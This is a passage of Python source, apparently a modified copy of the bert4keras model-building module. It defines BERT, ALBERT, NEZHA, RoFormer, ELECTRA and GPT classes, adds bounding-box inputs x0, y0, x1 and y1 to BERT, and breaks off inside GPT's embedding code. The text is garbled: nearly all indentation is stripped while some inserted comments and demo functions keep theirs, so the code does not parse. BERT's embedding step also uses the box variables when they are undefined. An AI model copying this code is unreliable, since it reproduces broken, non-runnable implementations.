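    # self.apply(inputs=x, layer=Dense, units=768, name='Embedding-Mapping')
    # a second time with the same name does not build a new Dense layer; the
    # instance cached in self.layers under that name is reused, which is how
    # blocks built from the same model share weights by sharing names.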
def get_inputs(self):
raise NotImplementedError
def apply_embeddings(self, inputs):
raise NotImplementedError
def apply_main_layers(self, inputs, index):
raise NotImplementedError
def apply_final_layers(self, inputs):
raise NotImplementedError
def compute_attention_bias(self, inputs=None):
"""定义每一层的Attention Bias
"""
return self.attention_bias
def compute_position_bias(self, inputs=None):
"""定义每一层的Position Bias(一般相对位置编码用)
"""
return self.position_bias
def set_inputs(self, inputs, additional_input_layers=None):
"""设置input和inputs属性
"""
if inputs is None:
inputs = []
elif not isinstance(inputs, list):
inputs = [inputs]
inputs = inputs[:]
if additional_input_layers is not None:
if not isinstance(additional_input_layers, list):
additional_input_layers = [additional_input_layers]
inputs.extend(additional_input_layers)
self.inputs = inputs
if len(inputs) > 1:
self.input = inputs
else:
self.input = inputs[0]
def set_outputs(self, outputs):
"""设置output和oututs属性
"""
if not isinstance(outputs, list):
outputs = [outputs]
outputs = outputs[:]
self.outputs = outputs
if len(outputs) > 1:
self.output = outputs
else:
self.output = outputs[0]
@property
def initializer(self):
"""默认使用截断正态分布初始化
"""
return keras.initializers.TruncatedNormal(stddev=0.02)
def simplify(self, inputs):
"""将list中的None过滤掉
"""
inputs = [i for i in inputs if i is not None]
if len(inputs) == 1:
inputs = inputs[0]
return inputs
def load_embeddings(self, embeddings):
"""处理Embedding层权重
"""
embeddings = embeddings.astype(K.floatx()) # 防止np.average报错
if self.keep_tokens is not None:
embeddings = embeddings[self.keep_tokens]
if self.compound_tokens is not None:
ext_embeddings = []
for item in self.compound_tokens:
if isinstance(item, list):
item = (item, [1] * len(item))
ext_embeddings.append(
np.average(embeddings[item[0]], 0, item[1])
)
embeddings = np.concatenate([embeddings, ext_embeddings], 0)
return embeddings
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
if isinstance(checkpoint, dict):
return checkpoint[name]
else:
return tf.train.load_variable(checkpoint, name)
def create_variable(self, name, value, dtype=None):
"""创建一个变量
"""
dtype = dtype or K.floatx()
return K.variable(
self.initializer(value.shape, dtype), dtype, name=name
), value
def variable_mapping(self):
"""构建keras层与checkpoint的变量名之间的映射表
"""
return {}
def load_weights_from_checkpoint(self, checkpoint, mapping=None):
"""根据mapping从checkpoint加载权重
"""
mapping = mapping or self.variable_mapping()
mapping = {self.prefixed(k): v for k, v in mapping.items()}
mapping = {k: v for k, v in mapping.items() if k in self.layers}
weight_value_pairs = []
for layer, variables in mapping.items():
layer = self.layers[layer]
weights, values = [], []
            for w, v in zip(layer.trainable_weights, variables):  # allows skipping missing weights
try:
values.append(self.load_variable(checkpoint, v))
weights.append(w)
except Exception as e:
if self.ignore_invalid_weights:
print('%s, but ignored.' % e.message)
else:
raise e
if isinstance(layer, MultiHeadAttention):
"""如果key_size不等于head_size,则可以通过
正交矩阵将相应的权重投影到合适的shape。
"""
count = 2
if layer.use_bias:
count += 2
heads = self.num_attention_heads
head_size = self.attention_head_size
key_size = self.attention_key_size
W = np.linalg.qr(np.random.randn(key_size, head_size))[0].T
if layer.attention_scale:
W = W * key_size**0.25 / head_size**0.25
for w, v in zip(weights, values):
if is_one_of(w, layer.trainable_weights[:count]):
w_shape, v_shape = K.int_shape(w), v.shape
if w_shape[-1] != v_shape[-1]:
pre_shape = w_shape[:-1]
v = v.reshape(pre_shape + (heads, head_size))
v = np.dot(v, W)
v = v.reshape(pre_shape + (heads * key_size,))
values[weights.index(w)] = v
weight_value_pairs.extend(zip(weights, values))
K.batch_set_value(weight_value_pairs)
def save_weights_as_checkpoint(self, filename, mapping=None, dtype=None):
"""根据mapping将权重保存为checkpoint格式
"""
mapping = mapping or self.variable_mapping()
mapping = {self.prefixed(k): v for k, v in mapping.items()}
mapping = {k: v for k, v in mapping.items() if k in self.layers}
with tf.Graph().as_default():
all_variables, all_values = [], []
for layer, variables in mapping.items():
layer = self.layers[layer]
values = K.batch_get_value(layer.trainable_weights)
for name, value in zip(variables, values):
variable, value = self.create_variable(name, value, dtype)
all_variables.append(variable)
all_values.append(value)
with tf.Session() as sess:
K.batch_set_value(zip(all_variables, all_values))
saver = tf.train.Saver()
saver.save(sess, filename)
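    # Hedged round-trip sketch (the paths are hypothetical, not from this file):
    #
    #   model.load_weights_from_checkpoint('bert_model.ckpt')
    #   model.save_weights_as_checkpoint('bert_model_copy.ckpt')
    #
    # Both directions are driven by variable_mapping(), so a subclass only has
    # to declare the name mapping to get loading and saving.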
class LM_Mask(object):
"""定义下三角Attention Mask(语言模型用)
"""
def compute_attention_bias(self, inputs=None):
"""通过idxs序列的比较来得到对应的mask
"""
if self.attention_bias is None:
def lm_mask(s):
seq_len = K.shape(s)[1]
idxs = K.arange(0, seq_len)
mask = idxs[None, :] <= idxs[:, None]
mask = K.cast(mask, K.floatx())
return -(1 - mask[None, None]) * 1e12
self.attention_bias = self.apply(
inputs=self.inputs[0],
layer=Lambda,
function=lm_mask,
name='Attention-LM-Mask'
)
return self.attention_bias
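def _lm_mask_demo(seq_len=3):
    """Illustration added to this dump, not part of the original module: a
    numpy sketch of what lm_mask computes. Entry (i, j) is 1 when position i
    may attend to position j, giving a lower-triangular matrix; the layer
    then turns this into a bias of -(1 - mask) * 1e12 (~ -inf when masked).
    """
    idxs = np.arange(seq_len)
    return (idxs[None, :] <= idxs[:, None]).astype('float32')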
class UniLM_Mask(object):
"""定义UniLM的Attention Mask(Seq2Seq模型用)
其中source和target的分区,由segment_ids来表示。
UniLM: https://arxiv.org/abs/1905.03197
"""
def compute_attention_bias(self, inputs=None):
"""通过idxs序列的比较来得到对应的mask
"""
if self.attention_bias is None:
def unilm_mask(s):
idxs = K.cumsum(s, axis=1)
mask = idxs[:, None, :] <= idxs[:, :, None]
mask = K.cast(mask, K.floatx())
return -(1 - mask[:, None]) * 1e12
self.attention_bias = self.apply(
inputs=self.inputs[1],
layer=Lambda,
function=unilm_mask,
name='Attention-UniLM-Mask'
)
return self.attention_bias
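def _unilm_mask_demo(segment_ids=(0, 0, 1, 1)):
    """Illustration added to this dump, not part of the original module: with
    segment_ids [0, 0, 1, 1] the cumulative sum is [0, 0, 1, 2], so source
    tokens attend bidirectionally among themselves while target tokens see the
    source plus their own prefix. Returns the 0/1 mask before biasing.
    """
    s = np.array([segment_ids])
    idxs = np.cumsum(s, axis=1)
    return (idxs[:, None, :] <= idxs[:, :, None]).astype('float32')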
class BERT(Transformer):
"""构建BERT模型
"""
def __init__(
self,
        max_position,  # maximum sequence length
        segment_vocab_size=2,  # total number of segments
        with_pool=False,  # whether to include the Pool part
        with_nsp=False,  # whether to include the NSP part
        with_mlm=False,  # whether to include the MLM part
        hierarchical_position=None,  # whether to hierarchically decompose position encodings
        custom_position_ids=False,  # whether position ids are passed in by the caller
        shared_segment_embeddings=False,  # if True, segments share the token embedding
        **kwargs  # remaining arguments
):
super(BERT, self).__init__(**kwargs)
self.max_position = max_position
self.segment_vocab_size = segment_vocab_size
self.with_pool = with_pool
self.with_nsp = with_nsp
self.with_mlm = with_mlm
self.hierarchical_position = hierarchical_position
self.custom_position_ids = custom_position_ids
self.shared_segment_embeddings = shared_segment_embeddings
if self.with_nsp and not self.with_pool:
self.with_pool = True
    # FIXME: the Bert model inputs were modified to add the corresponding x0, x1, y0, y1
def get_inputs(self):
"""BERT的输入是token_ids和segment_ids
(但允许自行传入位置id,以实现一些特殊需求)
"""
x_in = self.apply(
layer=Input, shape=(self.sequence_length,), name='Input-Token'
)
inputs = [x_in]
if self.segment_vocab_size > 0:
s_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-Segment'
)
inputs.append(s_in)
if self.custom_position_ids:
#p_in = self.apply(
# layer=Input,
# shape=(self.sequence_length,),
# name='Input-Position'
#)
#inputs.append(p_in)
x0_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-x0'
)
inputs.append(x0_in)
y0_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-y0'
)
inputs.append(y0_in)
x1_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-x1'
)
inputs.append(x1_in)
y1_in = self.apply(
layer=Input,
shape=(self.sequence_length,),
name='Input-y1'
)
inputs.append(y1_in)
return inputs
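    # Interpretation of the modified inputs (added commentary, not from the
    # original bert4keras source): when custom_position_ids is set, the single
    # Input-Position line is replaced by four sequences x0, y0, x1, y1 --
    # per-token bounding-box coordinates in the spirit of layout-aware models
    # such as WebKE/LayoutLM -- so the expected feed order becomes
    # [token_ids, segment_ids, x0, y0, x1, y1].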
def apply_embeddings(self, inputs):
"""BERT的embedding是token、position、segment三者embedding之和
"""
inputs = inputs[:]
x = inputs.pop(0)
if self.segment_vocab_size > 0:
s = inputs.pop(0)
#if self.custom_position_ids:
# p = inputs.pop(0)
#else:
# p = None
if self.custom_position_ids:
x0 = inputs.pop(0)
y0 = inputs.pop(0)
x1 = inputs.pop(0)
y1 = inputs.pop(0)
else:
p = None
z = self.layer_norm_conds[0]
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
if self.segment_vocab_size > 0:
if self.shared_segment_embeddings:
name = 'Embedding-Token'
else:
name = 'Embedding-Segment'
s = self.apply(
inputs=s,
layer=Embedding,
input_dim=self.segment_vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
name=name
)
x = self.apply(
inputs=[x, s], layer=Add, name='Embedding-Token-Segment'
)
'''
x = self.apply(
inputs=self.simplify([x, p]),
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
custom_position_ids=self.custom_position_ids,
name='Embedding-Position'
)
'''
x = self.apply(
inputs=self.simplify([x, x0, y0, x1, y1]),
layer=PositionEmbedding,
input_dim=self.max_position,
output_dim=self.embedding_size,
merge_mode='add',
hierarchical=self.hierarchical_position,
embeddings_initializer=self.initializer,
custom_position_ids=self.custom_position_ids,
name='Embedding-Position'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Embedding-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""BERT的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi, x, arguments = x, [x, x, x], {'a_bias': None}
if attention_mask is not None:
arguments['a_bias'] = True
x.append(attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def apply_final_layers(self, inputs):
"""根据剩余参数决定输出
"""
x = inputs
z = self.layer_norm_conds[0]
outputs = [x]
if self.with_pool:
            # Pooler part (extracts the CLS vector)
x = outputs[0]
x = self.apply(
inputs=x,
layer=Lambda,
function=lambda x: x[:, 0],
name='Pooler'
)
pool_activation = 'tanh' if self.with_pool is True else self.with_pool
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
activation=pool_activation,
kernel_initializer=self.initializer,
name='Pooler-Dense'
)
if self.with_nsp:
                # Next Sentence Prediction part
x = self.apply(
inputs=x,
layer=Dense,
units=2,
activation='softmax',
kernel_initializer=self.initializer,
name='NSP-Proba'
)
outputs.append(x)
if self.with_mlm:
            # Masked Language Model part
x = outputs[0]
x = self.apply(
inputs=x,
layer=Dense,
units=self.embedding_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name='MLM-Dense'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='MLM-Norm'
)
x = self.apply(
inputs=x,
layer=Embedding,
arguments={'mode': 'dense'},
name='Embedding-Token'
)
x = self.apply(inputs=x, layer=BiasAdd, name='MLM-Bias')
mlm_activation = 'softmax' if self.with_mlm is True else self.with_mlm
x = self.apply(
inputs=x,
layer=Activation,
activation=mlm_activation,
name='MLM-Activation'
)
outputs.append(x)
if len(outputs) == 1:
outputs = outputs[0]
elif len(outputs) == 2:
outputs = outputs[1]
else:
outputs = outputs[1:]
return outputs
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(BERT, self).load_variable(checkpoint, name)
if name in [
'bert/embeddings/word_embeddings',
'cls/predictions/output_bias',
]:
return self.load_embeddings(variable)
elif name == 'cls/seq_relationship/output_weights':
return variable.T
else:
return variable
def create_variable(self, name, value, dtype=None):
"""在tensorflow中创建一个变量
"""
if name == 'cls/seq_relationship/output_weights':
value = value.T
return super(BERT, self).create_variable(name, value, dtype)
def variable_mapping(self):
"""映射到官方BERT权重格式
"""
mapping = {
'Embedding-Token': ['bert/embeddings/word_embeddings'],
'Embedding-Segment': ['bert/embeddings/token_type_embeddings'],
'Embedding-Position': ['bert/embeddings/position_embeddings'],
'Embedding-Norm': [
'bert/embeddings/LayerNorm/beta',
'bert/embeddings/LayerNorm/gamma',
],
'Embedding-Mapping': [
'bert/encoder/embedding_hidden_mapping_in/kernel',
'bert/encoder/embedding_hidden_mapping_in/bias',
],
'Pooler-Dense': [
'bert/pooler/dense/kernel',
'bert/pooler/dense/bias',
],
'NSP-Proba': [
'cls/seq_relationship/output_weights',
'cls/seq_relationship/output_bias',
],
'MLM-Dense': [
'cls/predictions/transform/dense/kernel',
'cls/predictions/transform/dense/bias',
],
'MLM-Norm': [
'cls/predictions/transform/LayerNorm/beta',
'cls/predictions/transform/LayerNorm/gamma',
],
'MLM-Bias': ['cls/predictions/output_bias'],
}
for i in range(self.num_hidden_layers):
prefix = 'bert/encoder/layer_%d/' % i
mapping.update({
'Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'attention/self/query/kernel',
prefix + 'attention/self/query/bias',
prefix + 'attention/self/key/kernel',
prefix + 'attention/self/key/bias',
prefix + 'attention/self/value/kernel',
prefix + 'attention/self/value/bias',
prefix + 'attention/output/dense/kernel',
prefix + 'attention/output/dense/bias',
],
'Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'attention/output/LayerNorm/beta',
prefix + 'attention/output/LayerNorm/gamma',
],
'Transformer-%d-FeedForward' % i: [
prefix + 'intermediate/dense/kernel',
prefix + 'intermediate/dense/bias',
prefix + 'output/dense/kernel',
prefix + 'output/dense/bias',
],
'Transformer-%d-FeedForward-Norm' % i: [
prefix + 'output/LayerNorm/beta',
prefix + 'output/LayerNorm/gamma',
],
})
return mapping
class ALBERT(BERT):
"""构建ALBERT模型
"""
def apply_main_layers(self, inputs, index):
"""ALBERT的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-MultiHeadSelfAttention'
feed_forward_name = 'Transformer-FeedForward'
attention_mask = self.compute_attention_bias(index)
# Self Attention
xi, x, arguments = x, [x, x, x], {'a_bias': None}
if attention_mask is not None:
arguments['a_bias'] = True
x.append(attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def variable_mapping(self):
"""映射到官方ALBERT权重格式
"""
mapping = super(ALBERT, self).variable_mapping()
prefix = 'bert/encoder/transformer/group_0/inner_group_0/'
mapping.update({
'Transformer-MultiHeadSelfAttention': [
prefix + 'attention_1/self/query/kernel',
prefix + 'attention_1/self/query/bias',
prefix + 'attention_1/self/key/kernel',
prefix + 'attention_1/self/key/bias',
prefix + 'attention_1/self/value/kernel',
prefix + 'attention_1/self/value/bias',
prefix + 'attention_1/output/dense/kernel',
prefix + 'attention_1/output/dense/bias',
],
'Transformer-MultiHeadSelfAttention-Norm': [
prefix + 'LayerNorm/beta',
prefix + 'LayerNorm/gamma',
],
'Transformer-FeedForward': [
prefix + 'ffn_1/intermediate/dense/kernel',
prefix + 'ffn_1/intermediate/dense/bias',
prefix + 'ffn_1/intermediate/output/dense/kernel',
prefix + 'ffn_1/intermediate/output/dense/bias',
],
'Transformer-FeedForward-Norm': [
prefix + 'LayerNorm_1/beta',
prefix + 'LayerNorm_1/gamma',
],
})
return mapping
class ALBERT_Unshared(BERT):
"""解开ALBERT共享约束,当成BERT用
"""
def variable_mapping(self):
"""映射到官方ALBERT权重格式
"""
mapping = super(ALBERT_Unshared, self).variable_mapping()
prefix = 'bert/encoder/transformer/group_0/inner_group_0/'
for i in range(self.num_hidden_layers):
mapping.update({
'Transformer-%d-MultiHeadSelfAttention' % i: [
prefix + 'attention_1/self/query/kernel',
prefix + 'attention_1/self/query/bias',
prefix + 'attention_1/self/key/kernel',
prefix + 'attention_1/self/key/bias',
prefix + 'attention_1/self/value/kernel',
prefix + 'attention_1/self/value/bias',
prefix + 'attention_1/output/dense/kernel',
prefix + 'attention_1/output/dense/bias',
],
'Transformer-%d-MultiHeadSelfAttention-Norm' % i: [
prefix + 'LayerNorm/beta',
prefix + 'LayerNorm/gamma',
],
'Transformer-%d-FeedForward' % i: [
prefix + 'ffn_1/intermediate/dense/kernel',
prefix + 'ffn_1/intermediate/dense/bias',
prefix + 'ffn_1/intermediate/output/dense/kernel',
prefix + 'ffn_1/intermediate/output/dense/bias',
],
'Transformer-%d-FeedForward-Norm' % i: [
prefix + 'LayerNorm_1/beta',
prefix + 'LayerNorm_1/gamma',
],
})
return mapping
class NEZHA(BERT):
"""华为推出的NAZHA模型
链接:https://arxiv.org/abs/1909.00204
"""
def apply_embeddings(self, inputs):
"""NEZHA的embedding是token、segment两者embedding之和
"""
inputs = inputs[:]
x = inputs.pop(0)
if self.segment_vocab_size > 0:
s = inputs.pop(0)
z = self.layer_norm_conds[0]
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
if self.segment_vocab_size > 0:
if self.shared_segment_embeddings:
name = 'Embedding-Token'
else:
name = 'Embedding-Segment'
s = self.apply(
inputs=s,
layer=Embedding,
input_dim=2,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
name=name
)
x = self.apply(
inputs=[x, s], layer=Add, name='Embedding-Token-Segment'
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='Embedding-Norm'
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='Embedding-Dropout'
)
if self.embedding_size != self.hidden_size:
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
kernel_initializer=self.initializer,
name='Embedding-Mapping'
)
return x
def apply_main_layers(self, inputs, index):
"""NEZHA的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias(x)
# Self Attention
xi, x = x, [x, x, x, position_bias]
arguments = {'a_bias': None, 'p_bias': 'typical_relative'}
if attention_mask is not None:
arguments['a_bias'] = True
x.insert(3, attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def compute_position_bias(self, inputs=None):
"""经典相对位置编码
"""
if self.position_bias is None:
x = inputs
self.position_bias = self.apply(
inputs=[x, x],
layer=RelativePositionEmbedding,
input_dim=2 * 64 + 1,
output_dim=self.attention_key_size,
embeddings_initializer='Sinusoidal',
name='Embedding-Relative-Position',
trainable=False
)
return self.position_bias
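def _relative_position_ids_demo(qlen=5, klen=5, max_distance=64):
    """Illustration added to this dump, not part of the original module: a
    sketch of the classic relative-position scheme implied by
    input_dim = 2 * 64 + 1. Pairwise offsets k - q are clipped to
    [-max_distance, max_distance] and shifted into ids in [0, 2*max_distance].
    """
    q_idx = np.arange(qlen)[:, None]
    k_idx = np.arange(klen)[None, :]
    return np.clip(k_idx - q_idx, -max_distance, max_distance) + max_distance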
class RoFormer(NEZHA):
"""旋转式位置编码的BERT模型
链接:https://kexue.fm/archives/8265
"""
def apply_main_layers(self, inputs, index):
"""RoFormer的主体是基于Self-Attention的模块
顺序:Att --> Add --> LN --> FFN --> Add --> LN
"""
x = inputs
z = self.layer_norm_conds[0]
attention_name = 'Transformer-%d-MultiHeadSelfAttention' % index
feed_forward_name = 'Transformer-%d-FeedForward' % index
attention_mask = self.compute_attention_bias(index)
position_bias = self.compute_position_bias(x)
# Self Attention
xi, x = x, [x, x, x, position_bias]
arguments = {'a_bias': None, 'p_bias': 'rotary'}
if attention_mask is not None:
arguments['a_bias'] = True
x.insert(3, attention_mask)
x = self.apply(
inputs=x,
layer=MultiHeadAttention,
arguments=arguments,
heads=self.num_attention_heads,
head_size=self.attention_head_size,
out_dim=self.hidden_size,
key_size=self.attention_key_size,
kernel_initializer=self.initializer,
name=attention_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % attention_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % attention_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % attention_name
)
# Feed Forward
xi = x
x = self.apply(
inputs=x,
layer=FeedForward,
units=self.intermediate_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name=feed_forward_name
)
x = self.apply(
inputs=x,
layer=Dropout,
rate=self.dropout_rate,
name='%s-Dropout' % feed_forward_name
)
x = self.apply(
inputs=[xi, x], layer=Add, name='%s-Add' % feed_forward_name
)
x = self.apply(
inputs=self.simplify([x, z]),
layer=LayerNormalization,
conditional=(z is not None),
hidden_units=self.layer_norm_conds[1],
hidden_activation=self.layer_norm_conds[2],
hidden_initializer=self.initializer,
name='%s-Norm' % feed_forward_name
)
return x
def compute_position_bias(self, inputs=None):
"""Sinusoidal位置编码(直接返回)
"""
if self.position_bias is None:
x = inputs
self.position_bias = self.apply(
inputs=x,
layer=SinusoidalPositionEmbedding,
output_dim=self.attention_key_size,
merge_mode='zero',
name='Embedding-Rotary-Position'
)
return self.position_bias
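def _rotary_demo(vecs):
    """Illustration added to this dump, not part of the original module:
    merge_mode='zero' above only returns the sinusoidal table; the attention
    layer is expected to rotate Q and K with it. For a float array vecs of
    shape [seq_len, dim] (dim even), each pair (2i, 2i+1) at position m is
    rotated by m * theta_i, so that <q_rot(m), k_rot(n)> depends only on m - n.
    """
    seq_len, dim = vecs.shape
    pos = np.arange(seq_len)[:, None]
    freq = 10000 ** (-np.arange(0, dim, 2, dtype='float64') / dim)
    cos, sin = np.cos(pos * freq), np.sin(pos * freq)
    x, y = vecs[:, 0::2], vecs[:, 1::2]
    out = np.empty_like(vecs)
    out[:, 0::2] = x * cos - y * sin
    out[:, 1::2] = y * cos + x * sin
    return out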
class ELECTRA(BERT):
"""Google推出的ELECTRA模型
链接:https://arxiv.org/abs/2003.10555
"""
@insert_arguments(with_discriminator=False)
@delete_arguments('with_pool', 'with_mlm')
def __init__(
self,
        max_position,  # maximum sequence length
        **kwargs  # remaining arguments
):
super(ELECTRA, self).__init__(max_position, **kwargs)
def apply_final_layers(self, inputs):
x = inputs
if self.with_discriminator:
if self.with_discriminator is True:
final_activation = 'sigmoid'
else:
final_activation = self.with_discriminator
x = self.apply(
inputs=x,
layer=Dense,
units=self.hidden_size,
activation=self.hidden_act,
kernel_initializer=self.initializer,
name='Discriminator-Dense'
)
x = self.apply(
inputs=x,
layer=Dense,
units=1,
activation=final_activation,
kernel_initializer=self.initializer,
name='Discriminator-Prediction'
)
return x
def load_variable(self, checkpoint, name):
"""加载单个变量的函数
"""
variable = super(ELECTRA, self).load_variable(checkpoint, name)
if name == 'electra/embeddings/word_embeddings':
return self.load_embeddings(variable)
else:
return variable
def variable_mapping(self):
mapping = super(ELECTRA, self).variable_mapping()
mapping['Embedding-Mapping'] = [
'electra/embeddings_project/kernel',
'electra/embeddings_project/bias',
]
mapping = {
k: [i.replace('bert/', 'electra/') for i in v]
for k, v in mapping.items()
}
mapping['Discriminator-Dense'] = [
'discriminator_predictions/dense/kernel',
'discriminator_predictions/dense/bias',
]
mapping['Discriminator-Prediction'] = [
'discriminator_predictions/dense_1/kernel',
'discriminator_predictions/dense_1/bias',
]
return mapping
class GPT(LM_Mask, BERT):
"""构建GPT模型
链接:https://github.com/openai/finetune-transformer-lm
"""
@insert_arguments(final_activation='softmax')
@delete_arguments('with_pool', 'with_mlm')
def __init__(self, **kwargs):
super(GPT, self).__init__(**kwargs)
def apply_embeddings(self, inputs):
"""GPT的embedding是token、position、segment三者embedding之和
跟BERT的主要区别是三者相加之后没有加LayerNormalization层。
"""
inputs = inputs[:]
x = inputs.pop(0)
if self.segment_vocab_size > 0:
s = inputs.pop(0)
if self.custom_position_ids:
p = inputs.pop(0)
else:
p = None
x = self.apply(
inputs=x,
layer=Embedding,
input_dim=self.vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
mask_zero=True,
name='Embedding-Token'
)
if self.segment_vocab_size > 0:
if self.shared_segment_embeddings:
name = 'Embedding-Token'
else:
name = 'Embedding-Segment'
s = self.apply(
inputs=s,
layer=Embedding,
input_dim=self.segment_vocab_size,
output_dim=self.embedding_size,
embeddings_initializer=self.initializer,
name=name
)
